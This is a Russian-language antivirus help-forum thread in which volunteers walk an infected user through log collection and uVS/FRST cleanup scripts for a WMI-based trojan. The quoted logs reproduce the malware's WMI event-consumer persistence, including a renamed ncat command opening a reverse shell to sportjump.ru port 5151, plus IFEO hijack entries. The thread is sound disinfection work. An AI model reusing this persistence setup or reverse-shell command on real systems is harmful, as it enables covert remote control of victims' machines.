Перейти к содержанию

[РЕШЕНО] Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a


Рекомендуемые сообщения

Здравствуйте! При попытке скачать эксель (видимо, первая ссылка в браузере меня оказалась с подвохом) получила троян со страшным длинным названием. Касперский его обнаружил и предложил удалить, на что я согласилась. Но после он начал присылать мне, что обнаружил и запретил приложение WmiPrvSE.exe. Я провела полную проверку, угроз не обнаружено, но во время неё Касперский каждые 5 минут присылал одно и то же уведомление с обнаружением и запрещением того самого приложения и продолжает до сих пор. Скажите, что делать, пожалуйста..

CollectionLog-2024.04.22-02.39.zip

Ссылка на комментарий
Поделиться на другие сайты

1. Добавьте, пожалуйста, логи из журнала обнаружений антивируса Касперского

2.  Подготовьте логи анализа системы при помощи Farbar Recovery Scan Tool.

 

Ссылка на комментарий
Поделиться на другие сайты

Архив логов их журнала Касперского получается большим, чтобы прикрепить его сюда, поэтому даю ссылку на Яндекс.Диск https://disk.yandex.ru/d/UBNjrE1wT5CJzQ

FRST.txt Addition.txt

Ссылка на комментарий
Поделиться на другие сайты

+

Добавьте образ автозапуска системы в uVS.

1. Скачать архив программы можно отсюда:

2. Распакуйте данный архив с программой в отдельный каталог и запустите файл Start.exe
(для Vista, W7, W8, W10, W11 запускаем с правами администратора)
3. В стартовом окне программы - нажмите "запустить под текущим пользователем"
(если текущий пользователь с правами администратора).

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время.txt) автоматически добавится в архив 7z или rar.
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме. Ждем ответ.

Ссылка на комментарий
Поделиться на другие сайты

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
;------------------------autoscript---------------------------

delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\NUN.BAT
delall %SystemDrive%\PROGRAMDATA\CLASSIC.{BB06C0E4-D293-4F75-8A90-CB05B6477EEE}\NUN.BAT
delref %SystemDrive%\USERS\USER\APPDATA\LOCAL\YANDEX\YANDEXBROWSER\USER DATA\DEFAULT\EXTENSIONS\NPDPPLBICNMPOIGIDFDJADAMGFKILAAK\10.8_0\SAVEFROM.NET ПОМОЩНИК
delall %SystemRoot%\TEMP\PMNYYZBELNUA.SYS
apply

deltmp
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK\V2.0.50727\MSCORSEC.DLL
delref %SystemDrive%\PAPKA\ARC\PLUGINS\ARCPLUGINIE.DLL
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref %SystemDrive%\PAPKA\ARC\PLUGINS\NPARCPLUGINFF.DLL
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %Sys32%\DRIVERS\VMBUSR.SYS
delref %SystemRoot%\MICROSOFT.NET\FRAMEWORK64\V2.0.50727\MSCORSEC.DLL
delref %Sys32%\DRIVERS\UMDF\USBCCIDDRIVER.DLL
delref %Sys32%\BLANK.HTM
delref %Sys32%\DRIVERS\HDAUDADDSERVICE.SYS
;-------------------------------------------------------------

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

Ссылка на комментарий
Поделиться на другие сайты

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения (прошло 20 минут с перезагрузки). Сейчас в ЛС отправлю архив

2024-04-22_10-57-42_log.txt

Ссылка на комментарий
Поделиться на другие сайты

Возможно было ложное срабатывание на запуск данного файла

C:\PROGRAMDATA\AUX..\SHELLEXT.DLL

 

понаблюдайте некоторое время, возможно сообщение будет выходить с новым периодом.

лог обнаружения угроз  в антивирусе надо переделать.

 он нужен в текстовом формате:

например:

Quote

Сегодня, 28.03.2024 3:50:51        Задача завершена    Задача завершена                                        DESKTOP-K4PNU0M\ASUS    Активный пользователь
Сегодня, 28.03.2024 3:50:51    C:\Program Files\Process Hacker 2\ProcessHacker.exe    Не обработано    Лечение невозможно    not-a-virus:HEUR:RiskTool.Win32.ProcHack.gen    Пропущено    Файл    C:\Program Files\Process Hacker 2    ProcessHacker.exe    Не обработано    Легальная программа, которая может быть использована злоумышленником для нанесения вреда компьютеру или данным пользователя    Низкая    Эвристический анализ    DESKTOP-K4PNU0M\ASUS    Активный пользователь

 

Ссылка на комментарий
Поделиться на другие сайты

Спасибо. Судя по логу последние срабатывания были вчера.

Quote

Сегодня, 22.04.2024 10:56:12    Обнаружен вредоносный объект    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Обнаружено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Обнаружено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe    C:\Windows\System32\wbem    Процесс    Поведенческий анализ
Сегодня, 22.04.2024 10:56:12    Запрещено    WMI Provider Host    WmiPrvSE.exe    C:\Windows\System32\wbem    8040    NT AUTHORITY\СИСТЕМА    Системный пользователь    Запрещено: PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Запрещено    PDM:Trojan.Win32.GenAutorunWmiCommandLineEventConsumerRun.a    Троянское приложение    Высокая    Точно    WmiPrvSE.exe    WmiPrvSE.exe   

 

Ссылка на комментарий
Поделиться на другие сайты

Есть еще подозрительный объект, который запускается через WMI:

Quote

 

Полное имя                  C:\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
Имя файла                   STARTMENUEXPERIENCEHOST.EXE
Тек. статус                 ?ВИРУС? ПОДОЗРИТЕЛЬНЫЙ в автозапуске
                            
www.virustotal.com          2024-04-20 22:01 [2021-08-08]
-                           Файл был чист на момент проверки.
                            
Удовлетворяет критериям     
WMI_COMMANDLINEEVENTCONSUMER.LIST(CONSUMER_CLASS ~ COMMANDLINEEVENTCONSUMER)(1) [auto (0)]
                            
Сохраненная информация      на момент создания образа
Статус                      ПРОВЕРЕННЫЙ в автозапуске
File_Id                     610D7BD853000
Linker                      14.29
Размер                      322256 байт
Создан                      29.03.2024 в 19:49:18
Изменен                     07.08.2021 в 21:57:21
                            
TimeStamp                   06.08.2021 в 18:13:44
EntryPoint                  +
OS Version                  6.0
Subsystem                   Windows character-mode user interface (CUI) subsystem
IMAGE_FILE_DLL              -
IMAGE_FILE_EXECUTABLE_IMAGE +
Оригинальное имя            NCAT.EXE
Тип файла                   32-х битный ИСПОЛНЯЕМЫЙ
Цифр. подпись               Действительна, подписано Insecure.Com LLC
                            
Доп. информация             на момент обновления списка
SHA1                        8DB3F91ADDB22A506EAD3D0F7B9242A3F6CED640
MD5                         41889943C2AD6880ED7529B3132857A3
                            
Namespace                   \\.\root\subscription
Consumer_Name               nut
Consumer_Class              CommandLineEventConsumer
Consumer_CommandLineTemplateC:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe
Filter_Name                 nut
Filter_Class                __EventFilter
Filter_Query                SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'
#MOF_Bind#                  
instance of __FilterToConsumerBinding
{
    Consumer = "CommandLineEventConsumer.Name=\"nut\"";
    Filter = "__EventFilter.Name=\"nut\"";
};

#MOF_Event#                 
instance of __EventFilter
{
    EventNamespace = "root\\cimv2";
    Name = "nut";
    Query = "SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";
    QueryLanguage = "WQL";
};

#MOF_Consumer#              
instance of CommandLineEventConsumer
{
    CommandLineTemplate = "C:\\ProgramData\\NUL..\\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe";
    Name = "nut";
};

                            

 

 

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню выбираем "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и перезагрузит ее.

Скрипт ниже:
 

;uVS v4.15.2 [http://dsrt.dyndns.org:8888]
;Target OS: NTv10.0
v400c
OFFSGNSAVE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
zoo %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
zoo %SystemDrive%\PROGRAMDATA\AUX..\UTSHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\AUX..\SHELLEXT.DLL
zoo %SystemDrive%\PROGRAMDATA\NUL..\STARTMENUEXPERIENCEHOST.EXE
;---------command-block---------
delall %SystemDrive%\PAPKA\LDPLAYER\LDMUTIPLAYER\DNMULTIPLAYEREX.EXE
delall %SystemDrive%\PAPKA\LDPLAYER\LDPLAYER9\DNPLAYER.EXE
delall %SystemDrive%\PROGRAM FILES\LDPLAYER9BOX\LD9BOXSUP.SYS
apply

restart
czoo

После перезагрузки системы добавьте файл Дата_времяlog.txt из папки uVS, напишите по результату, что с проблемой.

Архив ZOO_дата_время.7z загрузите на облачный диск и дайте ссылку на скачивание в ЛС.

Изменено пользователем safety
Ссылка на комментарий
Поделиться на другие сайты

Скачайте по ссылке файл и разархивируйте.

Запустите каждый файл и подтвердите внесение информации в реестр.


1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
S2 BITS_bkp; C:\Windows\System32\qmgr.dll [1481216 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S2 dosvc_bkp; C:\Windows\system32\dosvc.dll [1534464 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S2 UsoSvc_bkp; C:\Windows\system32\usosvc.dll [570368 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
S3 WaaSMedicSvc_bkp; C:\Windows\System32\WaaSMedicSvc.dll [427520 2024-04-02] (Microsoft Windows -> Microsoft Corporation)
S3 wuauserv_bkp; C:\Windows\system32\wuaueng.dll [3436544 2024-04-11] (Microsoft Windows -> Microsoft Corporation)
R4 WinRing0_1_2_0; C:\Windows\TEMP\pmnyyzbelnua.sys [14544 2024-04-22] (Noriyuki MIYAZAKI -> OpenLibSys.org) <==== ВНИМАНИЕ
Folder: C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
Folder: C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nur\"",Filter="__EventFilter.Name=\"nur\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"pers\"",Filter="__EventFilter.Name=\"pers\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"nut\"",Filter="__EventFilter.Name=\"nut\"::
WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"per\"",Filter="__EventFilter.Name=\"per\"::
WMI:subscription\__EventFilter->nur::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->nut::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 180 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->per::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\__EventFilter->pers::[Query => SELECT * FROM __InstanceModificationEvent WITHIN 900 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System']
WMI:subscription\CommandLineEventConsumer->nur::[CommandLineTemplate => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat]
WMI:subscription\CommandLineEventConsumer->nut::[CommandLineTemplate => C:\ProgramData\NUL..\StartMenuExperienceHost.exe sportjump.ru 5151 -e cmd.exe]
WMI:subscription\CommandLineEventConsumer->per::[CommandLineTemplate => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat][ExecutablePath => C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat]
WMI:subscription\CommandLineEventConsumer->pers::[CommandLineTemplate => C:\ProgramData\AUX..\ShellExt.dll C:\ProgramData\AUX..\utshellext.dll]
BHO-x32: ArcPluginIEBHO Class -> {84BFE29A-8139-402a-B2A4-C23AE9E1A75F} -> C:\papka\Arc\Plugins\ArcPluginIE.dll => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


После перезагрузки удалите старые и соберите новые логи FRST.txt и Addition.txt.

Ссылка на комментарий
Поделиться на другие сайты

Касперский после перезагрузки системы не присылал уведомление об обнаружении и запрещении приложения. Сейчас в ЛС отправлю архив

2024-04-23_11-29-14_log.txt

 

И лог-файлы для thyrex

Addition.txt Fixlog.txt FRST.txt

Ссылка на комментарий
Поделиться на другие сайты

1. Выделите следующий код и скопируйте в буфер обмена (правая кнопка мышиКопировать)

Start::
CreateRestorePoint:
IFEO\svchost.exe: [GlobalFlag] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
HKLM\...\SilentProcessExit\svchost.exe: [MonitorProcess] C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}\nun.bat
IFEO\TrustedInstaller.exe: [GlobalFlag] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
HKLM\...\SilentProcessExit\TrustedInstaller.exe: [MonitorProcess] C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}\nun.bat
Edge HomePage: Default -> hxxps://?
Edge StartupUrls: Default -> "hxxps://?"
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB64F8A7-BEE7-4E1A-AB8D-7D8273F7FDB6}
2024-04-22 01:38 - 2024-04-22 10:57 - 000000000 _RSHD C:\ProgramData\Classic.{BB06C0E4-D293-4f75-8A90-CB05B6477EEE}
FirewallRules: [{2ca0ac4f-06cc-4485-bd82-74173a5cfbf0}] => (Allow) C:\papka\LDPlayer\LDPlayer9\dnplayer.exe => Нет файла
FirewallRules: [TCP Query User{74F56A9F-9121-4452-9F35-9E1F836672C6}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
FirewallRules: [UDP Query User{747D95DB-300C-4331-9811-04E42D22D602}E:\sdi_r2309\sdi_x64_r2309.exe] => (Block) E:\sdi_r2309\sdi_x64_r2309.exe => Нет файла
Reboot:
End::

2. Запустите Farbar Recovery Scan Tool от имени Администратора по правой кнопке мыши.
3. Нажмите один раз на кнопку Fix (Исправить) и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

  • Обратите внимание: будет выполнена перезагрузка компьютера.


 
Ссылка на комментарий
Поделиться на другие сайты

Гость
Эта тема закрыта для публикации ответов.
  • Похожий контент

    • ipostnov
      От ipostnov
      Добрый день. Поймал Trojan.Win32.SEPEH.gen и никак не могу удалить.

       
      CollectionLog-2024.11.11-14.29.zip
    • rottingcorpse
    • woknelam
      От woknelam
      Здравствуйте. Не удаляется троян. Trojan.Win32.SEPEH.gen Вроде бы лечит, потом выдает синий экран , перезагрузка и все заново
       
      Сообщение от модератора Mark D. Pearlstone Тема перемещена из раздела "Компьютерная помощь"
    • koshelev_forwor
      От koshelev_forwor
      Извините, нашел на форуме топик по удалению Trojan.Win32.SEPEH.gen, не смог открыть некоторые изображения и файлы, буду благодарен за персональную помощь, т.к мало что понимаю из текста того топика. Касперский вроде что-то делает, а каждый раз после перезагрузки вылетает предупреждение. 
       
      Сообщение от модератора kmscom Тема перемещена из раздела Компьютерная помощь
    • Ири27
      От Ири27
      На компьютере Касперским был обнаружен  MEM: Trojan.Win32.SEPEH.gen.
      Пять раз его удаляла, но он появляется снова. Логи прикрепляю.CollectionLog-2024.11.27-10.20.zip 
×
×
  • Создать...